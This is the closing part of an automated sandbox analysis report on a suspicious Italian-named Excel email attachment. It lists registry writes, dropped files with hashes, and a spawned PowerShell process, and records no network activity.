HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5172
Lithuanian Standard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5184
Sorbian Standard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5181
Georgian (Ergonomic)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5178
Bengali - INSCRIPT
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5142
Sami Extended Finland-Sweden
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5180
Bulgarian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5050
Greek (220) Latin
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5027
United States-Dvorak for left hand
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5082
Thai Pattachote (non-ShiftLock)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5195
Bulgarian (Phonetic Traditional)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5051
Greek (319) Latin
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5028
United States-Dvorak for right hand
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5047
Greek Latin
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5123
US English Table for IBM Arabic 238_L
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5122
Greek Polytonic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\system32\input.dll,-5183
Microsoft IME
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5149
Chinese (Traditional) - New Quick
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5067
Chinese (Traditional) - ChangJie
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5111
Chinese (Traditional) - Quick
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5066
Chinese (Traditional) - Phonetic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5090
Chinese (Traditional) - New Phonetic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5093
Chinese (Traditional) - New ChangJie
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5091
Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5076
Chinese (Simplified) - Microsoft Pinyin ABC Input Style
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90
Tablet PC Correction
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5183
Microsoft IME
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\IME\SpTip.DLL,-102
Speech Recognition
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10
Chinese Traditional DaYi (version 6.0)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11
Chinese Traditional Array (version 6.0)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17
Amharic Input Method (version 1.0)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16
Yi Input Method (version 1.0)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12
Chinese Simplified QuanPin (version 6.0)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14
Chinese Simplified ZhengMa (version 6.0)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13
Chinese Simplified ShuangPin (version 6.0)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91
Tablet PC Text Insertion
3816
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000409
3816
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000410
3816
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
3816
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
3816
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International\Geo
Nation
118
2952
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2952
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
2952
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12FE20
2952
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
2952
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12FF29
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
7l;
376C3B00880B0000010000000000000000000000
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
880B000012D2547D020BD50100000000
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12FE20
12FE20
04000000880B00005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000C0FBA07D020BD50120FE120020FE120000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12FE20
12FE20
04000000880B00005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000C0FBA07D020BD50120FE120020FE120000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2952
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1320091673
2952
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1320091795
2952
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1320091653
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12FE20
12FE20
04000000880B00005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000C0FBA07D020BD50120FE120020FE120000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12FF29
12FF29
04000000880B00005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000A0B29858020BD50129FF120029FF120000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D50B027DC99260][O00000000]*C:\Users\admin\Desktop\
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D50B027DD0BE50][O00000000]*C:\Users\admin\Desktop\2019_EmailCliente_0000065445_Allegato1_20190515061941.xls
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2952
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1320091796
2952
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1320091797
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
127
2952
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
127
3084
powERSHELl.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
2
Text files
6
Unknown types
3

Dropped files

PID
Process
Filename
Type
2952
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFE91D28177FB26B65.TMP
––
MD5:  ––
SHA256:  ––
2952
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRFCB7.tmp.cvr
––
MD5:  ––
SHA256:  ––
3084
powERSHELl.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 16d0fd6e07266b2c15a9d7bc6623f506
SHA256: 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b
3084
powERSHELl.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF130293.TMP
binary
MD5: 16d0fd6e07266b2c15a9d7bc6623f506
SHA256: 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b
3084
powERSHELl.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MNVQNJ4CYIUZAVRAAJ11.temp
––
MD5:  ––
SHA256:  ––
2952
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: cf4705b200240d898af30bda70d234f5
SHA256: e5730f0910ba6035e91f80c59973a099c007c29126f1a7dedd38bd8aff1f4711
2952
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2019_EmailCliente_0000065445_Allegato1_20190515061941.xls.LNK
lnk
MD5: 182c96ad6232f1a882aabd5b2877324f
SHA256: 1586df16923265de5dcbf270d449f1cfb295aa253ec50ed1eb834cf8ce792b3e
2952
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DF3E2AA14C64886E54.TMP
––
MD5:  ––
SHA256:  ––
2088
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFCBEA1D39495730BE.TMP
––
MD5:  ––
SHA256:  ––
2088
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFAB74F0CBEBD99A4B.TMP
––
MD5:  ––
SHA256:  ––
2088
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: cf4705b200240d898af30bda70d234f5
SHA256: e5730f0910ba6035e91f80c59973a099c007c29126f1a7dedd38bd8aff1f4711
2088
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2019_EmailCliente_0000065445_Allegato1_20190515061941.xls.LNK
lnk
MD5: 182c96ad6232f1a882aabd5b2877324f
SHA256: 1586df16923265de5dcbf270d449f1cfb295aa253ec50ed1eb834cf8ce792b3e
2088
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 87fb5791b46d9ada90404a703ee2e93c
SHA256: fdbaf772430ce606d8a650691a36011a1d2bea2d6a189eada835098fa174b2a3
2088
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRDA4.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

No debug info.